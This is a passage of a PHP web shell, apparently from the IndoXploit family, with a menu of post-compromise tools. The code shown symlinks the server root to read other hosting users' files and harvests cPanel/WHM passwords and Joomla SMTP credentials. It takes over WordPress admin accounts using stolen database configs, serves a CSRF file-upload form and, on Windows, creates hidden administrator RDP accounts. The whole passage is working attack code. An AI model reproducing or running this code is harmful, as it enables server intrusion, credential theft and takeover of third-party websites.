809. echo "<li> <a href='?dir=$dir&do=sym3'>/etc/named.conf Symlink</a> </li>";
810. echo "</ul>";
811. echo "</center>";
812.  
813. if ($win) {
814. echo "<center><br/><br/><nobr><span class='b9'>Symlink Is Not Available In Windows Server</span></nobr><br/><br/></center>";
815. }
816. @mkdir('btm1sym', 0777);
817. $sempak = "Options all
818.  
819. DirectoryIndex btm.html
820.  
821. AddType text/plain .php
822.  
823. AddHandler server-parsed .php
824.  
825. AddType text/plain .html
826.  
827. AddHandler txt .html
828.  
829. Require None
830.  
831. Satisfy Any";
832. $masuk = @fopen('btm1sym/.htaccess', 'w');
833. fwrite($masuk, $sempak);
834. @symlink('/', 'btm1sym/btm.txt');
835. $pg = basename(__FILE__);
836. if (is_readable("/var/named")) {
837. echo '<center>Symlink based /var/named<br><br></center>
838. <table align="center" border="3" width="400" cellspacing="0" cellpadding="0">
839. <td align="center"> <font color="white"> <b>DOMAINS</td>
840. <td align="center"> <font color="white"> <b>USERS</td>
841. <td align="center"> <font color="white"> <b>SYMLINK</center></td>';
842. $list = scandir("/var/named");
843. foreach ($list as $domain) {
844. if (strpos($domain, ".db")) {
845. @error_reporting(0);
846. @ini_set('log_errors', 0);
847. @ini_set('error_log', NULL);
848. $i+= 1;
849. $domain = str_replace('.db', '', $domain);
850. $owner = posix_getpwuid(@fileowner("/etc/valiases/" . $domain));
851. echo "<tr>
852. <td><a class='dm' href='http://" . $domain . " '>" . $domain . "</a></td>
853. <td align='center'><font color='white'>" . $owner['name'] . "</td>
854. <td align='center'><a href='btm1sym/btm.txt" . $owner['dir'] . "/public_html/' target='_blank'>Symlink</a></td>";
855. }
856. }
857. flush();
858. flush();
859. }
860. echo "</tr></table></div></html>";
861.  
862. }
863. elseif($_GET['do'] == 'tool') {
864. echo "<center>";
865. echo "<ul>";
866. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
867. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
868. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
869. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
870. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
871. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
872. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
873. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
874. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
875. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
876. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
877. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
878. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
879. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
880. echo "</ul>";
881. echo "</center>";
882. }
883. elseif($_GET['do'] == 'manjat') {
884. echo "<center>";
885. echo "<ul>";
886. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
887. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
888. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
889. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
890. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
891. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
892. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
893. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
894. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
895. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
896. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
897. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
898. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
899. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
900. echo "</ul>";
901. echo "</center>";
902.  
903. echo "<center>";
904. $d0mains = @file('/etc/named.conf');
905. $domains = scandir("/var/named");
906.  
907. if ($domains or $d0mains)
908. {
909. $domains = scandir("/var/named");
910. if($domains) {
911. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th></tr>";
912. $count=1;
913. $dc = 0;
914. $list = scandir("/var/named");
915. foreach($list as $domain){
916. if(strpos($domain,".db")){
917. $domain = str_replace('.db','',$domain);
918. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
919. $dirz = '/home/'.$owner['name'].'/cpanel3-skel';
920. $path = getcwd();
921.  
922. if (is_readable($dirz)) {
923. copy($dirz, ''.$path.'/lol/'.$owner['name'].'.txt');
924. $p=file_get_contents(''.$path.'/lol/'.$owner['name'].'.txt');
925. $password=entre2v2($p,'password="','"');
926. echo "<tr><td>".$count++."</td><td><a href='http://$domain' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td></tr>";
927. $dc++;
928. }
929.  
930. }
931. }
932. echo '</table>';
933. $total = $dc;
934. echo '<br><div class="result">Total WHM User Found = '.$total.'</h3><br />';
935. echo '</center>';
936. }else{
937. $d0mains = @file('/etc/named.conf');
938. if($d0mains) {
939. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th></tr>";
940. $count=1;
941. $dc = 0;
942. $mck = array();
943. foreach($d0mains as $d0main){
944. if(@eregi('zone',$d0main)){
945. preg_match_all('#zone "(.*)"#',$d0main,$domain);
946. flush();
947. if(strlen(trim($domain[1][0])) >2){
948. $mck[] = $domain[1][0];
949. }
950. }
951. }
952. $mck = array_unique($mck);
953. $usr = array();
954. $dmn = array();
955. foreach($mck as $o) {
956. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
957. $usr[] = $infos['name'];
958. $dmn[] = $o;
959. }
960. array_multisort($usr,$dmn);
961. $dt = file('/etc/passwd');
962. $passwd = array();
963. foreach($dt as $d) {
964. $r = explode(':',$d);
965. if(strpos($r[5],'home')) {
966. $passwd[$r[0]] = $r[5];
967. }
968. }
969. $l=0;
970. $j=1;
971. foreach($usr as $r) {
972. $dirz = '/home/'.$r.'/cpanel3-skel';
973. $path = getcwd();
974. if (is_readable($dirz)) {
975. copy($dirz, ''.$path.'/lol/'.$r.'.txt');
976. $p=file_get_contents(''.$path.'/lol/'.$r.'.txt');
977. $password=entre2v2($p,'password="','"');
978. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td></tr>";
979. $dc++;
980. flush();
981. $l=$l?0:1;
982. $j++;
983. }
984. }
985. }
986. echo '</table>';
987. $total = $dc;
988. echo '<br><div class="result">Total WHM Account Found = '.$total.'</h3><br />';
989. echo '</center>';
990.  
991. }
992. }
993.  
994. }
995. elseif($_GET['do'] == 'smtp') {
996. echo "<center>";
997. echo "<ul>";
998. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
999. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1000. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1001. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1002. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1003. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1004. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1005. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1006. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
1007. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1008. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1009. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1010. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1011. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1012. echo "</ul>";
1013. echo "</center>";
1014. echo"<center>
1015. <br><br><br>
1016. VHosts SMTP Grabber<br><br>
1017. <form method='post'>
1018. <textarea style='width: 450px; height: 150px;' name='sites' placeholder='http://domen.com/dir_config/config.txt'></textarea><br>
1019. <input type='submit' name='go' value='Hajar'>
1020. </form>";
1021. $ya=$_POST['go'];
1022. $co=$_POST['sites'];
1023.  
1024. if($ya){
1025. $e=explode("\r\n",$co);
1026. foreach($e as $bda){
1027. //echo '<br>'.$bda;
1028. $linkof='';
1029. $dn=($bda).($linkof);
1030. $file=@file_get_contents($dn);
1031. if(preg_match("/JConfig|joomla/", $file)) {
1032. echo'<center><font face="Iceland" color=Red >----------------------------------------------</font></center>';
1033. echo "<font face='Iceland' color=lime >SMTP USER : </font>".findit($file,"smtpuser = '","'")."<br>";
1034. echo "<font face='Iceland' color=lime >SMTP PASS : </font>".findit($file,"smtppass = '","'")."<br>";
1035. echo "<font face='Iceland' color=lime >SMTP HOST : </font>".findit($file,"smtphost = '","'")."<br>";
1036. echo "<font face='Iceland' color=lime >SMTP PORT : </font>".findit($file,"smtpport = '","'")."<br>";
1037. echo "<font face='Iceland' color=lime >SMTP AUTH : </font>".findit($file,"smtpauth = '","'")."<br>";
1038. echo "<font face='Iceland' color=lime >SMTP SECURE : </font>".findit($file,"smtpsecure = '","'")."<br>";
1039. }
1040.  
1041. else{echo "<center><font face='Iceland' color='Red' >".$bda." ----> There is no SMTP </font></center>";}
1042. echo'<center><font face="Iceland" color=red >----------------------------------------------</font></center>';
1043. }
1044.  
1045. }
1046.  
1047.  
1048. }
1049. elseif($_GET['do'] == 'scdc') {
1050. echo "<center>";
1051. echo "<ul>";
1052. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1053. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1054. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1055. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1056. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1057. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1058. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1059. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1060. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
1061. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1062. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1063. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1064. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1065. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1066. echo "</ul>";
1067. echo "</center>";
1068.  
1069. $text = $_POST['code'];
1070. echo"<center><br><b>Script Encode and Decode</b><br>
1071. <form method='post'><br><br><br>
1072. <textarea style='width: 450px; height: 150px;' name='code' placeholder='scmu'></textarea><br><br>
1073. <select class='inputz' size='1' name='ope'>
1074. <option value='base64'>Base64</option>
1075. <option value='gzinflate'>str_rot13 - gzinflate - base64</option>
1076. <option value='str'>str_rot13 - gzinflate - str_rot13 - base64</option>
1077. </select>&nbsp;<input type='submit' name='submit' value='Encrypt'>
1078. <input type='submit' name='submits' value='Decrypt'>
1079. </form>";
1080. $submit = $_POST['submit'];
1081. if (isset($submit)) {
1082. $op = $_POST["ope"];
1083. switch ($op) {
1084. case 'base64':
1085. $codi = base64_encode($text);
1086. break;
1087. case 'str':
1088. $codi = (base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
1089. break;
1090. case 'gzinflate':
1091. $codi = base64_encode(gzdeflate(str_rot13($text)));
1092. break;
1093. default:
1094. break;
1095. }
1096. }
1097. $submit = $_POST['submits'];
1098. if (isset($submit)) {
1099. $op = $_POST["ope"];
1100. switch ($op) {
1101. case 'base64':
1102. $codi = base64_decode($text);
1103. break;
1104. case 'str':
1105. $codi = str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
1106. break;
1107. case 'gzinflate':
1108. $codi = str_rot13(gzinflate(base64_decode($text)));
1109. break;
1110. default:
1111. break;
1112. }
1113. }
1114. echo "<textarea style='width: 450px; height: 150px;' readonly>$codi</textarea></center><BR><BR>";
1115. }
1116. elseif($_GET['do'] == 'csrf') {
1117. echo "<center>";
1118. echo "<ul>";
1119. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1120. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1121. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1122. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1123. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1124. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1125. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1126. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1127. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
1128. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1129. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1130. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1131. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1132. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1133. echo "</ul>";
1134. echo "</center>";
1135.  
1136. echo"<center> CSRF ONLINE
1137. <html>
1138. <form method='post'>
1139. <select name='array' required>
1140. <option value=''>Array</option>
1141. <option value='files[]'>files []</option>
1142. <option value='qqfile'>qqfile</option>
1143. <option value='Filedata'>Filedata</option>
1144. <option value='FileUpload'>FileUpload</option>
1145. <option value='userfile'>userfile</option>
1146. <option value='Uploadfile'>Uploadfile</option>
1147. <option value='file'>file</option>
1148. </select>
1149. <input type='text' name='target' size='50' height='10' placeholder='url http://site.com/bug/vuln.php' style='margin: 5px auto; padding-left: 5px;' required><br>
1150. <input type='submit' name='kunci' value='Lock!'>
1151. </form>";
1152.  
1153. $url = $_POST['target'];
1154. $pf = $_POST['array'];
1155. $terkuncyihh = $_POST['kunci'];
1156. if($terkuncyihh) {
1157. echo "<form method='post'
1158. target='_blank' action='$url'
1159. enctype='multipart/form-data'>
1160. <input type='file' name='$pf'>
1161. <input type='submit' name='g'
1162. value='Hajar'></form";
1163. }
1164. }
1165. elseif($_GET['do'] == 'dos') {
1166. echo "<center>";
1167. echo "<ul>";
1168. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1169. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1170. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1171. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1172. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1173. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1174. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1175. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1176. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
1177. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1178. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1179. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1180. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1181. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1182. echo "</ul>";
1183. echo "</center>";
1184.  
1185. $all = array();
1186. // domain finder.
1187. $d0mains = file('/etc/named.conf');
1188. $domains = scandir("/var/named");
1189.  
1190. if($domains or $d0mains){
1191. $count = 0;
1192. if($domains){
1193. echo "<center><h1>Count Domains on user</h1></center><br><br>";
1194. $cur = array();
1195. foreach($domains as $domain){
1196. if(strpos($domain, '.db')){
1197. $dom = str_replace('.db', '', $domain);
1198. $own = posix_getpwuid(fileowner("/etc/valiases/$dom"));
1199. $user = $own['name'];
1200. $all[$user][] = $dom;
1201. //echo "$user: $dom<br/>";
1202. }
1203. }
1204. echo "";
1205. }
1206. elseif($d0mains){
1207.  
1208. $mck = array();
1209. foreach($d0mains as $domain){
1210. preg_match_all('#zone "(.*)"#',$domain,$dom);
1211. flush();
1212. if(strlen(trim($domain[1][0])) >2){
1213. $mck[] = $dom[1][0];
1214. }
1215. }
1216.  
1217. $mck = array_unique($mck);
1218. foreach($mck as $dom){
1219. $own = posix_getpwuid(fileowner("/etc/valiases/$dom"));
1220. $user = $own['name'];
1221. $all[$user][] = $dom;
1222. //echo "$user: $dom<br/>";
1223. }
1224. echo "";
1225. }
1226. }
1227. foreach($all as $user => $domain){
1228. echo "<center>User <font color='red'>$user</font> has <font color='red'>".count($domain)."</font> Domains below :<br></center>";
1229. echo "<center>---------------<br>";
1230. foreach($domain as $v){
1231. echo "<center><a href='http://$v/' target='_blank'>http://$v<a><br></center>";
1232. }
1233. echo "<center>---------------";
1234. echo "<br><br>";
1235. }
1236.  
1237. }
1238. elseif($_GET['do'] == 'wpes') {
1239. echo "<center>";
1240. echo "<ul>";
1241. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1242. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1243. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1244. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1245. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1246. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1247. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1248. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1249. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
1250. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1251. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1252. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1253. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1254. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1255. echo "</ul>";
1256. echo "</center>";
1257.  
1258. if($_POST['auto_deface_wp']) {
1259. function anucurl($sites) {
1260. $ch = curl_init($sites);
1261. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1262. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1263. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1264. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
1265. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1266. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1267. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1268. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1269. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
1270. $data = curl_exec($ch);
1271. curl_close($ch);
1272. return $data;
1273. }
1274. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
1275. $post = array(
1276. "log" => "$userr",
1277. "pwd" => "$pass",
1278. "rememberme" => "forever",
1279. "wp-submit" => "$wp_submit",
1280. "redirect_to" => "$web",
1281. "testcookie" => "1",
1282. );
1283. $ch = curl_init($cek);
1284. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1285. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
1286. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
1287. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
1288. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
1289. curl_setopt($ch, CURLOPT_POST, 1);
1290. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
1291. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
1292. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
1293. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
1294. $data = curl_exec($ch);
1295. curl_close($ch);
1296. return $data;
1297. }
1298. $link = explode("\r\n", $_POST['link']);
1299. $script = htmlspecialchars($_POST['script']);
1300. $user = "bahari";
1301. $pass = "bahari";
1302. $passx = md5($pass);
1303. foreach($link as $dir_config) {
1304. $config = anucurl($dir_config);
1305. $dbhost = ambilkata($config,"DB_HOST', '","'");
1306. $dbuser = ambilkata($config,"DB_USER', '","'");
1307. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1308. $dbname = ambilkata($config,"DB_NAME', '","'");
1309. $dbprefix = ambilkata($config,"table_prefix = '","'");
1310. $prefix = $dbprefix."users";
1311. $option = $dbprefix."options";
1312. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1313. $db = mysql_select_db($dbname);
1314. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
1315. $result = mysql_fetch_array($q);
1316. $id = $result[ID];
1317. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1318. $result2 = mysql_fetch_array($q2);
1319. $target = $result2[option_value];
1320. if($target == '') {
1321. echo "Error, Cant edit the user :(</font><br>";
1322. } else {
1323. echo "<font color='lime'>Done</font> >> <a href='$target/wp-login.php' target='_blank'> $target <a><br>
1324. <font color='lime'>User</font> : bahari<br>
1325. <font color='lime'>Password</font> : bahari<br>";
1326. }
1327. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
1328. if(!$conn OR !$db OR !$update) {
1329. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
1330. mysql_close($conn);
1331. } else {
1332. }
1333. }
1334. } else {
1335. echo "<center><h1>WordPress Auto Edit User</h1>
1336. <form method='post'>
1337. Link Config: <br>
1338. <textarea name='link' placeholder='http://target.com/btm_conf/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
1339. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar'>
1340. </form></center>";
1341. }
1342. }
1343. elseif($_GET['do'] == 'rdp') {
1344. echo "<center>";
1345. echo "<ul>";
1346. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1347. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1348. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1349. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1350. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1351. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1352. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1353. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1354. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
1355. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1356. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1357. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1358. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
1359. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
1360. echo "</ul>";
1361. echo "</center>";
1362. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
1363. if($_POST['create']) {
1364. $user = htmlspecialchars($_POST['user']);
1365. $pass = htmlspecialchars($_POST['pass']);
1366. if(preg_match("/$user/", exe("net user"))) {
1367. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
1368. } else {
1369. $add_user = exe("net user $user $pass /add");
1370. $add_groups1 = exe("net localgroup Administrators $user /add");
1371. $add_groups2 = exe("net localgroup Administrator $user /add");
1372. $add_groups3 = exe("net localgroup Administrateur $user /add");
1373. echo "<center>[ RDP ACCOUNT INFO ]<br>
1374. ------------------------------<br>
1375. IP: <font color=lime>".$ip."</font><br>
1376. Username: <font color=lime>$user</font><br>
1377. Password: <font color=lime>$pass</font><br>
1378. ------------------------------<br><br>
1379. [ STATUS ]<br>
1380. ------------------------------<br>
1381. </center>";
1382. if($add_user) {
1383. echo "[add user] -> <font color='lime'>Berhasil</font><br>";
1384. } else {
1385. echo "[add user] -> <font color='red'>Gagal</font><br>";
1386. }
1387. if($add_groups1) {
1388. echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
1389. } elseif($add_groups2) {
1390. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
1391. } elseif($add_groups3) {
1392. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
1393. } else {
1394. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
1395. }
1396. echo "------------------------------<br>";
1397. }
1398. } elseif($_POST['s_opsi']) {
1399. $user = htmlspecialchars($_POST['r_user']);
1400. if($_POST['opsi'] == '1') {
1401. $cek = exe("net user $user");
1402. echo "Checking username <font color=lime>$user</font> ....... ";
1403. if(preg_match("/$user/", $cek)) {
1404. echo "[ <font color=lime>Sudah ada</font> ]<br>
1405. ------------------------------<br><br>
1406. <pre>$cek</pre>";
1407. } else {
1408. echo "[ <font color=red>belum ada</font> ]";
1409. }
1410. } elseif($_POST['opsi'] == '2') {
1411. $cek = exe("net user $user indoxploit");
1412. if(preg_match("/$user/", exe("net user"))) {
1413. echo "[change password: <font color=lime>indoxploit</font>] -> ";
1414. if($cek) {
1415. echo "<font color=lime>Berhasil</font>";
1416. } else {
1417. echo "<font color=red>Gagal</font>";
1418. }
1419. } else {
1420. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
1421. }
1422. } elseif($_POST['opsi'] == '3') {
1423. $cek = exe("net user $user /DELETE");
1424. if(preg_match("/$user/", exe("net user"))) {
1425. echo "[remove user: <font color=lime>$user</font>] -> ";
1426. if($cek) {
1427. echo "<font color=lime>Berhasil</font>";
1428. } else {
1429. echo "<font color=red>Gagal</font>";
1430. }
1431. } else {
1432. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
1433. }
1434. } else {
1435. //
1436. }
1437. } else {
1438. echo "<center>-- Create RDP --<br>
1439. <form method='post'>
1440. <input type='text' name='user' placeholder='username' value='denita' required>
1441. <input type='text' name='pass' placeholder='password' value='denita' required>
1442. <input type='submit' name='create' value='>>'>
1443. </form>
1444. -- Option --<br>
1445. <form method='post'>
1446. <input type='text' name='r_user' placeholder='username' required>
1447. <select name='opsi'>
1448. <option value='1'>Cek Username</option>
1449. <option value='2'>Ubah Password</option>
1450. <option value='3'>Hapus Username</option>
1451. </select>
1452. <input type='submit' name='s_opsi' value='>>'>
1453. </form></center>
1454. ";
1455. }
1456. } else {
1457. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
1458. }
1459.  
1460. }
1461. elseif($_GET['do'] == 'tetangga') {
1462. echo "<center>";
1463. echo "<ul>";
1464. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
1465. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
1466. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
1467. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
1468. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
1469. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
1470. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
1471. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
1472. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
1473. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
1474. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
1475. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
1476. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
